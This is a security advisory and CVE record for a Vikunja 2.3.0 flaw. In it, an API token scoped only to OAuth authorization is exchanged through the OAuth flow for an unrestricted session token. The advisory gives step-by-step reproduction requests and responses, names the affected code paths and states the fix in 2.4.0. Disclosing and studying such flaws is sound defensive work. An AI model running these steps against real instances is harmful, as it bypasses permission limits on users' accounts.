Vikunja is an open-source self-hosted task management platform. In version 2.3.0, a scoped API token limited to the `oauth.authorize` permission can call `POST /api/v1/oauth/authorize`, obtain an OAuth authorization code, and exchange the code at `POST /api/v1/oauth/token` for a normal bearer JSON Web Token (JWT) and refresh token. The resulting credentials are not restricted by the original API token's permissions, allowing access to routes outside its declared scope for the same user. Version 2.4.0 fixes the vulnerability.
Vikunja: Scoped API token can mint unrestricted OAuth session credentials
Problem type
Affected products
go-vikunja
= 2.3.0 - AFFECTED
References
https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v3p6-34mc-hj7v
https://github.com/go-vikunja/vikunja/commit/4ae2e093014881052ed8f8ecd8bcb9adf83dd276
https://github.com/go-vikunja/vikunja/releases/tag/v2.4.0
GitHub Security Advisories
GHSA-v3p6-34mc-hj7v
Vikunja: Scoped API token can mint unrestricted OAuth session credentials
https://github.com/advisories/GHSA-v3p6-34mc-hj7vSummary
A scoped API token can bypass its declared permissions by using the OAuth authorization flow to mint normal session credentials.
A token limited to:
{"oauth":["authorize"]}
can call /api/v1/oauth/authorize, receive an OAuth authorization code, exchange it at /api/v1/oauth/token, and obtain a normal bearer JWT plus refresh token. The resulting credentials are not restricted by the original API-token permissions.
Affected Component
- Scoped API tokens
- OAuth authorization flow
POST /api/v1/oauth/authorizePOST /api/v1/oauth/token
Impact
A narrowly scoped API token with only oauth.authorize can be converted into normal session credentials for the same user.
This bypasses the intended API-token permission boundary. An attacker who obtains or is delegated such a limited token can mint a normal JWT and refresh token, then access routes outside the original token scope.
Runtime validation showed that the original scoped token could not access GET /api/v1/user, but the minted OAuth access token could access:
GET /api/v1/userGET /api/v1/projects
No cross-user access, privilege escalation to admin, or access to another account was validated.
Technical Details
The issue is caused by an authentication-context mismatch between scoped API-token authentication and OAuth authorization-code issuance.
The vulnerable chain is:
- A scoped API token authenticates the request and sets the current user context.
/api/v1/oauth/authorizeaccepts that API-token-authenticated user as a valid OAuth resource owner.- The OAuth authorization endpoint issues an authorization code.
/api/v1/oauth/tokenexchanges that code for a normal bearer JWT and refresh token.- The resulting credentials are not bound to the original API-token permissions.
Relevant code paths:
pkg/routes/routes.go- registers
/api/v1/oauth/authorizein an authenticated API route group that also accepts scoped API tokens
- registers
pkg/models/api_routes.go- exposes non-CRUD subroutes as API-token permissions
- exposes the OAuth authorization endpoint under the
oauthpermission group
pkg/routes/api_tokens.go- stores
api_tokenandapi_userin the request context during API-token authentication
- stores
pkg/user/user.go- treats
api_useras an authenticated current user
- treats
pkg/modules/auth/oauth2server/authorize.go- uses the current user and issues an OAuth authorization code
pkg/modules/auth/oauth2server/token.go- exchanges the authorization code for a normal JWT and refresh token
Steps to Reproduce
1. Create a scoped API token
Create an API token with only the following permission:
{"oauth":["authorize"]}
Observed response:
201 Created
The returned token had only the oauth.authorize permission.
2. Negative control: direct access with scoped token fails
Request:
GET /api/v1/user
Authorization: Bearer <scoped-api-token>
Observed response:
401 Unauthorized
Response body:
{"code":11,"message":"missing, malformed, expired or otherwise invalid token provided"}
This confirms that the scoped token cannot directly access the normal user route.
3. Obtain an OAuth authorization code with the scoped token
Request:
POST /api/v1/oauth/authorize
Authorization: Bearer <scoped-api-token>
Content-Type: application/json
Body:
{
"response_type": "code",
"client_id": "vikunja",
"redirect_uri": "vikunja-flutter://callback",
"code_challenge": "<pkce-s256-challenge>",
"code_challenge_method": "S256"
}
Observed response:
200 OK
Response body:
{
"code": "<redacted>",
"redirect_uri": "vikunja-flutter://callback",
"state": ""
}
The scoped API token successfully obtained an OAuth authorization code.
4. Exchange the authorization code for session credentials
Request:
POST /api/v1/oauth/token
Content-Type: application/json
Body:
{
"grant_type": "authorization_code",
"code": "<redacted>",
"client_id": "vikunja",
"redirect_uri": "vikunja-flutter://callback",
"code_verifier": "<original-pkce-verifier>"
}
Observed response:
200 OK
Response body:
{
"access_token": "<redacted>",
"token_type": "bearer",
"expires_in": 600,
"refresh_token": "<redacted>"
}
The authorization code was exchanged for a normal access token and refresh token.
5. Use the minted access token on normal routes
Request:
GET /api/v1/user
Authorization: Bearer <minted-oauth-access-token>
Observed response:
200 OK
Additional scope check:
GET /api/v1/projects
Authorization: Bearer <minted-oauth-access-token>
Observed response:
200 OK
The minted OAuth access token could access normal non-OAuth routes that the original scoped API token could not access.
Expected Behavior
A scoped API token should not be able to obtain credentials with broader permissions than its declared scope.
/api/v1/oauth/authorize should require a normal user session or another authentication context suitable for OAuth authorization-code issuance. API-token-authenticated requests should not be accepted for minting OAuth authorization codes.
Actual Behavior
A token scoped only to oauth.authorize can obtain an OAuth authorization code and exchange it for a normal JWT plus refresh token.
The minted credentials are not restricted by the original API-token permissions.
https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v3p6-34mc-hj7v
https://github.com/go-vikunja/vikunja/commit/4ae2e093014881052ed8f8ecd8bcb9adf83dd276
https://github.com/go-vikunja/vikunja/releases/tag/v2.4.0
https://github.com/advisories/GHSA-v3p6-34mc-hj7v
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-57458Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-57458",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-10-09T20:46:29.356Z",
"dateReserved": "2026-06-24T13:21:20.731Z",
"datePublished": "2026-10-09T20:46:29.356Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-10-09T20:46:29.356Z"
},
"title": "Vikunja: Scoped API token can mint unrestricted OAuth session credentials",
"descriptions": [
{
"lang": "en",
"value": "Vikunja is an open-source self-hosted task management platform. In version 2.3.0, a scoped API token limited to the `oauth.authorize` permission can call `POST /api/v1/oauth/authorize`, obtain an OAuth authorization code, and exchange the code at `POST /api/v1/oauth/token` for a normal bearer JSON Web Token (JWT) and refresh token. The resulting credentials are not restricted by the original API token's permissions, allowing access to routes outside its declared scope for the same user. Version 2.4.0 fixes the vulnerability."
}
],
"affected": [
{
"vendor": "go-vikunja",
"product": "vikunja",
"versions": [
{
"version": "= 2.3.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-269: Improper Privilege Management",
"cweId": "CWE-269",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v3p6-34mc-hj7v",
"name": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v3p6-34mc-hj7v",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/go-vikunja/vikunja/commit/4ae2e093014881052ed8f8ecd8bcb9adf83dd276",
"name": "https://github.com/go-vikunja/vikunja/commit/4ae2e093014881052ed8f8ecd8bcb9adf83dd276",
"tags": [
"x_refsource_MISC"
]
},
{
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.4.0",
"name": "https://github.com/go-vikunja/vikunja/releases/tag/v2.4.0",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH"
}
}
]
}
}
}